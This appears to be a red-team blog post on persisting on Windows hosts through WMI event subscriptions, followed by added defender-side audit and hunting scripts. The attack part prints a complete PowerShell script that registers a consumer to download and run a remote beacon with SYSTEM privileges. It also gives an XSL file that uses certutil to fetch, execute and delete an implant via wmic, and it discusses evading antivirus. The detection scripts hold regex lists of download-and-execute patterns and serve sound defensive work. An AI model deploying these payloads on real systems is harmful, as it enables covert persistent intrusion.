Windows Single-Host Persistence [ WMI Events ]


Notice: original article; reposting in any form is not permitted.

0x01 Lab environment

IIS85-CN    192.168.3.5     Windows 2012 R2, 64-bit
IIS10-CN    192.168.3.22    Windows 2016, 64-bit

0x02 Getting a Beacon callback

What a WMI event subscription actually is will not be explained in this post; the focus for now is on practical use. First, prepare the corresponding PowerShell payload. Note in particular that a 64-bit PS payload is used directly here because the target is a 64-bit system; a 32-bit PS payload may have problems running on systems newer than Windows 2012 R2.

http://192.168.3.68:80/logo.gif


Below is the WMI-Persistence.ps1 script. The code is very simple: its three functions respectively insert the specified WMI event subscription, remove it, and list existing WMI event subscriptions. Only one thing needs to be changed, the remote payload address in $Payload. The event names can of course be changed to whatever you like, but it does not matter much if you leave them, since they are not obvious at a glance.

<#
Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence.  This script is an adaptation of his work.
#>

function Install-Persistence{

    $Payload = "((new-object net.webclient).downloadstring('http://192.168.3.68:80/logo.gif'))"
    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'
    $finalPayload = "powershell.exe -nop -c `"IEX $Payload`""

    # Create event filter
    $EventFilterArgs = @{
        EventNamespace = 'root/cimv2'
        Name = $EventFilterName
        Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
        QueryLanguage = 'WQL'
    }

    $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

    # Create CommandLineEventConsumer
    $CommandLineConsumerArgs = @{
        Name = $EventConsumerName
        CommandLineTemplate = $finalPayload
    }
    $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

    # Create FilterToConsumerBinding
    $FilterToConsumerArgs = @{
        Filter = $Filter
        Consumer = $Consumer
    }
    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs

    #Confirm the Event Filter was created
    $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    if ($EventCheck -ne $null) {
        Write-Host "Event Filter $EventFilterName successfully written to host"
    }

    #Confirm the Event Consumer was created
    $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    if ($ConsumerCheck -ne $null) {
        Write-Host "Event Consumer $EventConsumerName successfully written to host"
    }

    #Confirm the FiltertoConsumer was created
    $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
    if ($BindingCheck -ne $null){
        Write-Host "Filter To Consumer Binding successfully written to host"
    }

}

function Remove-Persistence{
    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'

    # Clean up Code - Comment this code out when you are installing persistence otherwise it will

    $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"

    $FilterConsumerBindingToCleanup | Remove-WmiObject
    $EventConsumerToCleanup | Remove-WmiObject
    $EventFilterToCleanup | Remove-WmiObject

}

function Check-WMI{
    Write-Host "Showing All Root Event Filters"
    Get-WmiObject -Namespace root/subscription -Class __EventFilter

    Write-Host "Showing All CommandLine Event Consumers"
    Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer

    Write-Host "Showing All Filter to Consumer Bindings"
    Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
}

Then insert the event subscription. Once it has been inserted successfully, the next time the target reboots and the administrator logs on normally, wait a moment (on 2016 it may take a little longer); once the system's background polling reaches our payload event, it is triggered and executed.

# powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI

A SYSTEM-privilege beacon is then returned as expected.
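The filter/consumer/binding triple the script creates is exactly what a defender should audit on a host. The following is an added defender-side example written for this page; it is not code from the original post or from WMI-Persistence.ps1. It enumerates root/subscription, joins every __FilterToConsumerBinding to its filter and consumer, flags consumers whose command line or script matches the download-and-execute patterns the post uses (the indicator list is an assumption derived from the post's payloads), and offers a dry-run capable removal in the same order as the post's Remove-Persistence. It assumes Windows PowerShell 3.0 or later with the CimCmdlets module, run from an elevated prompt.

```powershell
<#
Added defender-side audit example. Not code from the original post or from
WMI-Persistence.ps1. Assumes Windows PowerShell 3.0+ (CimCmdlets) and an
elevated prompt; the indicator regexes below are an assumed list derived
from the payload styles shown in the post.
#>

$script:SuspiciousPatterns = @(
    'powershell(\.exe)?.*(-nop|-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|downloadstring|net\.webclient)',
    'certutil(\.exe)?.*-urlcache',
    'wmic(\.exe)?.*/format:\s*"?https?:',
    'https?://'
)

# A reference property comes back as a CimInstance (CIM cmdlets) or as a path
# string such as __EventFilter.Name="Cleanup" (WMI cmdlets). Return class + key name for either.
function Resolve-WmiReference {
    param($Reference)
    if ($Reference -is [string]) {
        if ($Reference -match '^(?<class>[^.]+)\.Name="(?<name>[^"]+)"') {
            return @{ Class = $Matches['class']; Name = $Matches['name'] }
        }
        return @{ Class = ''; Name = $Reference }
    }
    return @{ Class = $Reference.CimClass.CimClassName; Name = $Reference.Name }
}

function Get-WmiSubscriptionAudit {
    [CmdletBinding()]
    param([string]$Namespace = 'root/subscription')

    $bindings = Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue
    foreach ($binding in $bindings) {
        $f = Resolve-WmiReference $binding.Filter
        $c = Resolve-WmiReference $binding.Consumer

        $filter = Get-CimInstance -Namespace $Namespace -ClassName __EventFilter -ErrorAction SilentlyContinue |
                  Where-Object { $_.Name -eq $f.Name }
        $consumer = if ($c.Class) {
            Get-CimInstance -Namespace $Namespace -ClassName $c.Class -ErrorAction SilentlyContinue |
                Where-Object { $_.Name -eq $c.Name }
        } else { $null }

        # CommandLineEventConsumer runs a command line; ActiveScriptEventConsumer runs VBScript/JScript.
        $payloadText = switch ($c.Class) {
            'CommandLineEventConsumer'  { "$($consumer.ExecutablePath) $($consumer.CommandLineTemplate)" }
            'ActiveScriptEventConsumer' { "$($consumer.ScriptFileName) $($consumer.ScriptText)" }
            default                     { '' }
        }
        $indicators = @($script:SuspiciousPatterns | Where-Object { $payloadText -imatch $_ })

        [pscustomobject]@{
            FilterName    = $f.Name
            Query         = $filter.Query          # e.g. the WITHIN 60 uptime-window query from the post
            ConsumerClass = $c.Class
            ConsumerName  = $c.Name
            Payload       = $payloadText.Trim()
            Suspicious    = ($indicators.Count -gt 0)
            Indicators    = ($indicators -join ' | ')
        }
    }
}

# Removes one subscription in the same order the post's Remove-Persistence uses:
# binding first, then consumer, then filter. Supports -WhatIf for a dry run.
function Remove-WmiSubscription {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory)][string]$FilterName,
        [Parameter(Mandatory)][string]$ConsumerName,
        [string]$ConsumerClass = 'CommandLineEventConsumer',
        [string]$Namespace = 'root/subscription'
    )
    Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding |
        Where-Object { (Resolve-WmiReference $_.Filter).Name -eq $FilterName -and
                       (Resolve-WmiReference $_.Consumer).Name -eq $ConsumerName } |
        ForEach-Object { if ($PSCmdlet.ShouldProcess("binding $FilterName -> $ConsumerName")) { Remove-CimInstance -InputObject $_ } }
    Get-CimInstance -Namespace $Namespace -ClassName $ConsumerClass | Where-Object { $_.Name -eq $ConsumerName } |
        ForEach-Object { if ($PSCmdlet.ShouldProcess("consumer $ConsumerName")) { Remove-CimInstance -InputObject $_ } }
    Get-CimInstance -Namespace $Namespace -ClassName __EventFilter | Where-Object { $_.Name -eq $FilterName } |
        ForEach-Object { if ($PSCmdlet.ShouldProcess("filter $FilterName")) { Remove-CimInstance -InputObject $_ } }
}

# Usage: list every binding, then show only the flagged ones in full.
Get-WmiSubscriptionAudit | Format-Table FilterName, ConsumerClass, ConsumerName, Suspicious -AutoSize
Get-WmiSubscriptionAudit | Where-Object Suspicious | Format-List
```

Run against a host where the post's script has been installed, the audit reports the `Cleanup` filter bound to the `DataCleanup` CommandLineEventConsumer with `Suspicious = True` (the `powershell ... -nop ... IEX ... downloadstring` and `https?://` indicators match). `Remove-WmiSubscription -FilterName Cleanup -ConsumerName DataCleanup -WhatIf` shows what would be deleted without touching anything; the binding is removed before the consumer and filter so that WMI never holds a dangling reference. Legitimate software (SCCM, some backup agents) also registers permanent subscriptions, so treat the flag as a triage prompt rather than a verdict.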

0x03 Custom callback

The above only roughly showed how to use a WMI event subscription to get a simple beacon callback. Next, let's look at how to get a custom implant to call back. For convenience, here we simply have wmic load and execute it remotely.

http://192.168.3.68:80/load.jpg   (the implant, renamed with a different extension)


What wmi.xsl does is straightforward: it is a certutil downloader.

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://*/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://*/load.jpg delete",0);
    ]]> </ms:script>
</stylesheet>

Modify the WMI-Persistence.ps1 script: only the payload part needs to be swapped for the command below; nothing else needs to change.

# wmic os get /FORMAT:"http://192.168.3.68:80/wmi.xsl"


Afterwards, insert the WMI event subscription exactly as before, wait for the target to reboot and for administrator to log on normally, wait a moment, and you will see our SYSTEM-privilege implant call back as expected, as follows:

powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI
PS > Remove-Persistence        (be sure to remove it when you are done)


Summary:

As you can see, by default the shell that comes back already has SYSTEM privileges. If I remember correctly, the rough principle is that the system keeps polling WMI events in the background, and when it reaches our payload event it triggers execution and the callback. Because the payload is hidden inside a WMI event subscription, it is hard to spot at a glance, so it is considerably stealthier [note, though, that while the event itself is hidden, the way the payload is triggered and executed is not necessarily so]. As long as the payload event is not discovered, detected or killed, the shell normally will not drop easily.

As for what a WMI event subscription actually is, space does not allow going into it here; if you are interested, Google it yourself. Also, the way the payload is executed in this post is meaningless against certain AV products, for example 360, because it will certainly intercept processes like certutil.exe, powershell.exe and wmic.exe that can be used for remote execution, one after another; every one of these directly triggers an alert. But only certain domestic AV products do this; it does not mean all AV will block it. How to get past these points will be covered after further study; this is only an introductory primer. Good luck 😊
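The summary's point that the subscription itself is hidden but its trigger is not also holds for logging: Windows records the moment a permanent binding is created, and Sysmon records each of the three objects. The following is an added hunting example written for this page (not the author's code and not part of WMI-Persistence.ps1). It queries the Microsoft-Windows-WMI-Activity/Operational log for event 5861, which is written when a new __FilterToConsumerBinding is registered and carries the consumer's full instance including its CommandLineTemplate, and the Sysmon log for events 19, 20 and 21 (WmiEventFilter, WmiEventConsumer, WmiEventConsumerToFilter). It assumes an elevated Windows PowerShell session on Windows 8.1 / Server 2012 R2 or later, and the Sysmon function only returns results where Sysmon is installed with WMI event logging configured; the indicator regex is an assumption derived from the post's payloads.

```powershell
<#
Added hunting example, not part of the original post. Assumes an elevated
Windows PowerShell session on Windows 8.1 / Server 2012 R2 or later; the
Sysmon function returns nothing unless Sysmon with WMI logging is installed.
The indicator regex is an assumption based on the payloads shown in the post.
#>

$script:DownloadExecPattern = 'powershell.*(-nop|\biex\b|downloadstring)|certutil.*-urlcache|wmic.*/format:|https?://'

# Event 5861 is logged once per new permanent binding. Its message text embeds the
# filter name, consumer reference and the consumer instance rendered as MOF, so the
# command line survives even if the subscription was later removed from WMI.
function Get-WmiBindingEvents {
    [CmdletBinding()]
    param([datetime]$Since = (Get-Date).AddDays(-30))

    $filter = @{ LogName = 'Microsoft-Windows-WMI-Activity/Operational'; Id = 5861; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $m = $_.Message
        $cmd = if ($m -match 'CommandLineTemplate = "(.*?)";') { $Matches[1] } else { '' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Namespace   = if ($m -match 'Namespace = ([^;]+);')    { $Matches[1] } else { '' }
            Filter      = if ($m -match 'Eventfilter = ([^;(]+)')  { $Matches[1].Trim() } else { '' }
            Consumer    = if ($m -match 'Consumer = ([^;]+);')     { $Matches[1] } else { '' }
            Query       = if ($m -match 'Query = "(.*?)";')        { $Matches[1] } else { '' }
            CommandLine = $cmd
            Suspicious  = ($cmd -imatch $script:DownloadExecPattern)
        }
    }
}

# Sysmon 19/20/21 carry structured EventData rather than free text; read it from the XML.
# 19 = filter (Query), 20 = consumer (Destination holds the command line), 21 = binding.
function Get-SysmonWmiEvents {
    [CmdletBinding()]
    param([datetime]$Since = (Get-Date).AddDays(-30))

    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 19, 20, 21; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($node in $xml.Event.EventData.Data) { $d[$node.Name] = $node.'#text' }
        $detail = switch ($_.Id) {
            19      { $d['Query'] }
            20      { $d['Destination'] }
            default { "$($d['Filter']) -> $($d['Consumer'])" }
        }
        [pscustomobject]@{
            Time       = $_.TimeCreated
            Id         = $_.Id
            Operation  = $d['Operation']
            User       = $d['User']
            Name       = $d['Name']
            Detail     = $detail
            Suspicious = ($_.Id -eq 20 -and $detail -imatch $script:DownloadExecPattern)
        }
    }
}

# Usage: bindings created in the last 30 days, flagged ones first, then the Sysmon timeline.
Get-WmiBindingEvents | Sort-Object Suspicious -Descending | Format-List
Get-SysmonWmiEvents | Sort-Object Time | Format-Table Time, Id, Operation, User, Name, Suspicious -AutoSize
```

On a host where the post's script ran, `Get-WmiBindingEvents` shows a 5861 record with `Filter = Cleanup`, `Consumer = CommandLineEventConsumer="DataCleanup"` and the `powershell.exe -nop -c "IEX ..."` template, and the `User` field of the Sysmon 19/20/21 events names the account that registered the subscription, which is the attribution the live WMI objects do not keep. Because 5861 is written at registration time, it also catches a subscription that was installed and then removed with Remove-Persistence, which is why log collection for this channel matters more than periodic enumeration.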


For more content, follow my WeChat official account or Zhishi Xingqiu "紅隊攻防揭秘"

--  by klion

